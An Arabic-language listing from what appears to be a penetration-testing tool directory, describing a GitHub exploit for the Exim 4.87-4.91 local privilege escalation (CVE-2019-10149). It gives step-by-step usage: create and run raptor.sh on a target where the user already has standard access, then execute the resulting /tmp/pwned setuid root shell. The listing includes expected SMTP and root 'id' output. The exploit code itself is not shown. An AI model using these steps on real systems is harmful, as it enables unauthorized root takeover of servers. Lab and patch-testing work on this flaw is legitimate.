Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-10149-Exim4-RCE — استغلال رفع صلاحيات محلي لـ Exim 4.87-4.91 (CVE-2019-10149). يقوم بتوصيل مساعد شل جذر setuid عبر أوامر SMTP مصمَّمة، مما يتيح رفع الصلاحيات من مستخدم عادي إلى الجذر. | Kitploit
أدوات/GitHubGitHub/cybersrmutl/cve-2019-10149-exim4-rce
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubcybersrmutl/cve-2019-10149-exim4-rce

CVE-2019-10149-Exim4-RCE

استغلال رفع صلاحيات محلي لـ Exim 4.87-4.91 (CVE-2019-10149). يقوم بتوصيل مساعد شل جذر setuid عبر أوامر SMTP مصمَّمة، مما يتيح رفع الصلاحيات من مستخدم عادي إلى الجذر.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

Cr.Exim 4.87 - 4.91 - تصعيد الصلاحيات المحلي

Cr.Link: https://www.exploit-db.com/exploits/46996

#1. تتطلب هذه الطريقة الوصول أولاً إلى الجهاز المستهدف بصلاحيات مستخدم قياسية.

#2. بمجرد الوصول إلى الجهاز المستهدف، قم بإنشاء ملف سكربت بالمحتوى التالي:

vi raptor.sh

#3. انسخ الكود من ملف 'raptor.sh' المقدم. ثم قم بتنفيذ الملف باستخدام الأمر:

chmod +x raptor.sh

./raptor.sh

#4. يجب أن تحصل على مخرجات مشابهة للمثال التالي:

Preparing setuid shell helper...

Delivering payload...

220 machine-noob

ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000

250 machine-noob

Hello localhost [127.0.0.1]

250 OK

250 Accepted

354 Enter message, ending with "." on a line by itself

250 OK id=1vQiEr-00001R-7t

221 machine-noob

closing connection

Waiting 5 seconds for Exim to execute payload...

-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned

#5. بعد ذلك، قم بتنفيذ الأمر التالي:

/tmp/pwned

#6. ثم حاول تشغيل الأمر 'id'. إذا رأيت النتيجة التالية:

uid=0(root) gid=0(root) groups=0(root),1001(noob)

تنزيل الأداة